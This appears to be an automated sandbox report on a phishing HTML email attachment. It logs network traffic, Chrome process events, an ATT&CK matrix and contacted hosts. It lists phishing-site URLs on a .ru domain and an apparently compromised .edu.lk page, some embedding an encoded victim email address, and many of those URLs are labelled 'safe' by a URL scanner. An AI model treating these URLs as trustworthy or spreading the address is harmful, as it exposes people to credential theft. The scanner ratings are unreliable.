          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49814 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_7112_1338836164Jump to behavior
          Source: classification engineClassification label: mal76.phis.evad.winHTML@24/25@34/18
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT00001.html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2040,i,1513467722100339984,2560911328542590446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2040,i,1513467722100339984,2560911328542590446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/#4ZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/#4ZGF2aWQueXZvbkBhZnRyYWwuY29t
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          11
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ATT00001.html0%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjf0%Avira URL Cloudsafe
          https://cascade-madmimi-com.translate.goog/logos/0028/7193/logox_0.png?ZBulnusKdtgyimF0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oS0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/65MQK7mlo31/8FDDCleRwIP0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk40%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urr0%Avira URL Cloudsafe
          https://aadcdn.msauthimages.net/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=6369730665077371810%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/0dYBKHbNSXk0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/69MiXSEC36w/1JnZnyDdbo0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY20%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6qTbSZFQpomlh5Jo/1emrd6kgjeh0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6hrZFScQzDHfHo/7DKiMCzMdg10%Avira URL Cloudsafe
          https://kibt.edu.lk/wp-header.php?2-53307050547934765338334f4d3036737944524f5336737954637a554b796f72546334767a637771317973714251413d-mknfazxqqVo0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVk0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDo0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/67sTSha9SVztfp/8jL0dJTGopn0%Avira URL Cloudsafe
          https://aadcdn.msauthimages.net/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=6369784798486062280%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6VgXjpQhSkDxT/1GTjuH2PpS3PpDRx0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/3ETwEspTY8j0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/favicon.ico0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V30%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQ0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/67csesv4NT/7LYfTUz8QHbjxIA0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6lp36DM7bxL/6YuqRWrsKjk0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6py3MCJoa2541Lb6/6Q7zPL1PIdTL1B0%Avira URL Cloudsafe
          file:///C:/Users/user/Desktop/ATT00001.html0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/1NvPLxRoMcdUBerpFudBvnKUtP/0%Avira URL Cloudsafe
          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/63Ag6b7lSc/5vOgy6RaRMInSrZ50%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          cascade-madmimi-com.translate.goog
          172.217.215.132
          truefalse
            unknown
            jsdelivr.map.fastly.net
            151.101.65.229
            truefalse
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                accounts.google.com
                74.125.138.84
                truefalse
                  high
                  kibt.edu.lk
                  192.185.5.187
                  truefalse
                    unknown
                    bggcwvekn3axi3ffz5ai.rvucouijw.ru
                    104.21.79.9
                    truetrue
                      unknown
                      sni1gl.wpc.upsiloncdn.net
                      152.195.19.97
                      truefalse
                        unknown
                        challenges.cloudflare.com
                        104.17.2.184
                        truefalse
                          high
                          www.google.com
                          142.250.105.105
                          truefalse
                            high
                            clients.l.google.com
                            64.233.177.138
                            truefalse
                              high
                              aadcdn.msauthimages.net
                              unknown
                              unknownfalse
                                unknown
                                clients1.google.com
                                unknown
                                unknownfalse
                                  high
                                  clients2.google.com
                                  unknown
                                  unknownfalse
                                    high
                                    cdn.jsdelivr.net
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6oIPrEsjzA9/2y7aQ7c0EhFH7oSfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/65MQK7mlo31/8FDDCleRwIPfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cascade-madmimi-com.translate.goog/logos/0028/7193/logox_0.png?ZBulnusKdtgyimFfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css.mapfalse
                                        high
                                        https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjffalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk4false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urrfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tfalse
                                          unknown
                                          https://aadcdn.msauthimages.net/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/0dYBKHbNSXkfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127false
                                            high
                                            https://a.nel.cloudflare.com/report/v3?s=xIs4GitNTFdKS3AY%2BYhM%2FRAckwwIG62VuJ8chdZDsC6k510203bTnoETMGEN4UdnuQ%2BDZBZ74uRapTIC2m5V6lBnKeNaaLIqGpm52PlD3QD%2BHUCmPyaltpHKqZh4Pad4SIDOn3%2FrgdiGc7vC9QAWlgvtc%2B8%3Dfalse
                                              high
                                              https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalfalse
                                                high
                                                https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItAfalse
                                                  unknown
                                                  https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/#4ZGF2aWQueXZvbkBhZnRyYWwuY29ttrue
                                                    unknown
                                                    https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/69MiXSEC36w/1JnZnyDdbofalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erfalse
                                                      unknown
                                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY2false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6qTbSZFQpomlh5Jo/1emrd6kgjehfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6hrZFScQzDHfHo/7DKiMCzMdg1false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/favicon.icofalse
                                                        high
                                                        https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.cssfalse
                                                          high
                                                          https://kibt.edu.lk/wp-header.php?2-53307050547934765338334f4d3036737944524f5336737954637a554b796f72546334767a637771317973714251413d-mknfazxqqVofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVkfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                            high
                                                            https://challenges.cloudflare.com/turnstile/v0/g/ea25f566/api.jsfalse
                                                              high
                                                              https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6ggGbKMm5p/3zCyDRX4zxDofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/67sTSha9SVztfp/8jL0dJTGopnfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39false
                                                                high
                                                                https://aadcdn.msauthimages.net/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=636978479848606228false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6VgXjpQhSkDxT/1GTjuH2PpS3PpDRxfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/3ETwEspTY8jfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                                  high
                                                                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                                    high
                                                                    https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/favicon.icofalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/84b92c841f99b127/1706276492524/rUSBpge9MP4B7lTfalse
                                                                      high
                                                                      https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825ED79361false
                                                                        high
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/84b92c841f99b127/1706276492529/0f9d73079a8b7d0394f678ae367e0851b92badef3e469819b69f138814626d66/Dm3EdLb9rOJ2F90false
                                                                          high
                                                                          https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://a.nel.cloudflare.com/report/v3?s=x3TYwlaqsyOhwm2S9MZBAtjo4fPOvx4m1v39y%2FH8AGcQh6la3Zr%2BBsw1d2tnhxGnOhEclm9BX1Fj6pROtWkg8OpxCIGtAbcMnafyA4FSdPAL7pzaDAIYlcKWwRevy%2BbV78aJZ653j4vwfynH4f5vEhwVv9w%3Dfalse
                                                                            high
                                                                            https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/67csesv4NT/7LYfTUz8QHbjxIAfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBtfalse
                                                                              unknown
